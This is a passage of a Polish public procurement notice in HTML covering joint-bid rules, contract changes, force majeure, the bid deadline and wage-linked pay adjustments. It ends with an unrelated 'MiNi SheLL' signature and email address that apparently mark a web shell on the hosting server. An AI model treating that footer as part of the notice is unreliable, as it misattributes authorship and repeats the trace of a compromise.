powołuje się na doświadczenie w realizacji usług, wykonywanych <br/>wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej, dotyczy usług, w <br/>których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku <br/>świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio<br/>uczestniczył lub uczestniczy.<br/>3) w celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w <br/>rozdziale 7 ust. 2 pkt 2 SWZ – wpis do rejestru wpisu do rejestru podmiotów <br/>wykonujących działalność leczniczą, zgodnie z ustawą z dnia 15 kwietnia 2011 r. o <br/>działalności leczniczej (t.j. Dz.U. z 2021 r., poz. 711)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (np. spółki cywilne, <br/>konsorcja), zgodnie z art. 58 ust. 2 ustawy Pzp, zobowiązani są ustanowić pełnomocnika. Z <br/>treści pełnomocnictwa winno jednoznacznie wynikać prawo pełnomocnika do <br/>reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo <br/>do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego w imieniu Wykonawcy. Dokument ten winien być podpisany przez <br/>osobę/osoby uprawnioną(-e) do jego udzielenia tj. zgodnie z formą reprezentacji każdego <br/>z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub profilem <br/>zaufanym lub podpisem osobistym). W przypadku wspólników spółki cywilnej <br/>dopuszczalne jest przedłożenie umowy spółki cywilnej, z której wynika zakres i sposób <br/>reprezentacji, a w przypadku konsorcjum przedłożenie umowy konsorcjum.<br/>. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do <br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo <br/>winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/>oświadczenia, o których mowa w Rozdziale 9 ust. 1 SWZ, składa każdy z Wykonawców. <br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/>oświadczenie, z którego wynika, które czynności (dostawy/usługi/roboty budowlane) <br/>wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w <br/>stosunku do treści złożonej oferty, na podstawie której dokonano wyboru Wykonawcy <br/>w przypadku: <br/>1) zamiany danych adresowych – w przypadku zmiany adresu Centrali lub Delegatur <br/>Zamawiającego; <br/>2) gdy nastąpiła zmiana przepisów prawa powszechnie obowiązującego, która ma <br/>wpływ na termin, sposób lub zakres realizacji przedmiotu umowy; <br/>3) zaistnienia omyłki pisarskiej lub rachunkowej; <br/>4) zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą na potrzeby <br/>niniejszej Umowy rozumieć należy zdarzenie zewnętrzne o charakterze <br/>niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem <br/>umowy, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec <br/>przy zachowaniu należytej staranności. Za siłę wyższą uważać się będzie w <br/>szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki <br/>terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, <br/>nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, <br/>kataklizmy wywołane siłami przyrody, zarządzenia władz; <br/>5) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, <br/>których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać <br/>usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej <br/>interpretacji jej zapisów przez Strony.<br/><br/>Dalsza część w informacjach dodatkowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym za pośrednictwem https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wynagrodzenie, o którym mowa w § 5 ust.4 umowy może ulec zmianie w przypadku: <br/>1) zmiany stawki podatku od towarów i usług VAT; <br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości <br/>minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia <br/>10 października 2002 r. o minimalnym wynagrodzeniu za pracę (t.j. Dz.U. z 2020 <br/>r. poz. 2207); <br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu <br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub <br/>zdrowotne; <br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o <br/>których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach <br/>kapitałowych (t.j. Dz. U. z 2020 r. poz. 1342) <br/>– jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez <br/>Wykonawcę. <br/>2. W wypadku zmiany, o której mowa w ust. 1 pkt 1, wartość netto wynagrodzenia <br/>Wykonawcy (tj. bez podatku od towarów i usług) nie zmieni się, a określona w <br/>aneksie wartość brutto wynagrodzenia zostanie wyliczona z uwzględnieniem stawki <br/>podatku od towarów i usług, wynikającej ze zmienionych przepisów. <br/>3. W przypadku zmiany, o której mowa w ust. 1 pkt 2, wynagrodzenie Wykonawcy <br/>zostanie podwyższone o wartość, o jaką wzrosną całkowite koszty wykonania umowy <br/>ponoszone przez Wykonawcę, a wynikające z podwyższenia wynagrodzeń <br/>poszczególnych pracowników biorących udział w realizacji pozostałej do wykonania, <br/>w momencie wejścia w życie zmiany, części zamówienia, do wysokości <br/>wynagrodzenia minimalnego obowiązującej po zmianie przepisów lub jej <br/>odpowiedniej części, w przypadku osób zatrudnionych w wymiarze niższym niż pełen <br/>etat. <br/>4. W przypadku zmian, o których mowa w ust. 1 pkt 2 i 3 powyżej, wynagrodzenie <br/>Wykonawcy zostanie podwyższone o kwotę, o jaką wzrosną całkowite koszty <br/>wykonania umowy ponoszone przez Wykonawcę, z powodu wzrostu kosztów <br/>Wykonawcy ze względu na konieczność odprowadzenia dodatkowych składek lub <br/>wpłat od wynagrodzeń osób zatrudnionych na umowę o pracę, biorących udział w <br/>realizacji pozostałej do wykonania w momencie wejścia w życie zmiany części <br/>zamówienia, przy założeniu braku zmiany wynagrodzenia netto tych osób. <br/>5. Zmiana umowy uwzględniająca zmiany wymienione w ust. 1 pkt 1-4 niniejszego <br/>paragrafu wymagają podpisania przez Strony umowy aneksu do umowy. Podpisanie <br/>aneksu – z wyjątkiem sytuacji, w której następuje zmniejszenie stawki podatku od <br/>towarów i usług VAT – musi być poprzedzone złożeniem przez Wykonawcę wniosku <br/>w sprawie zmiany umowy. Do wniosku Wykonawca zobowiązany jest załączyć <br/>projekt kalkulacji cenowej do umowy, uwzględniający przedmiotowe zmiany. <br/>6. Wynagrodzenie Wykonawcy ulegnie podwyższeniu, zgodnie z zasadami <br/>określonymi w ust. 1-4, o udokumentowaną przez Wykonawcę rzeczywistą kwotę <br/>wzrostu kosztów zamówienia publicznego, wynikających z wprowadzenia zmian <br/>przepisów, o których w ust. 1. Ciężar udowodnienia wzrostu poniesionych kosztów <br/>w całości leży po stronie Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com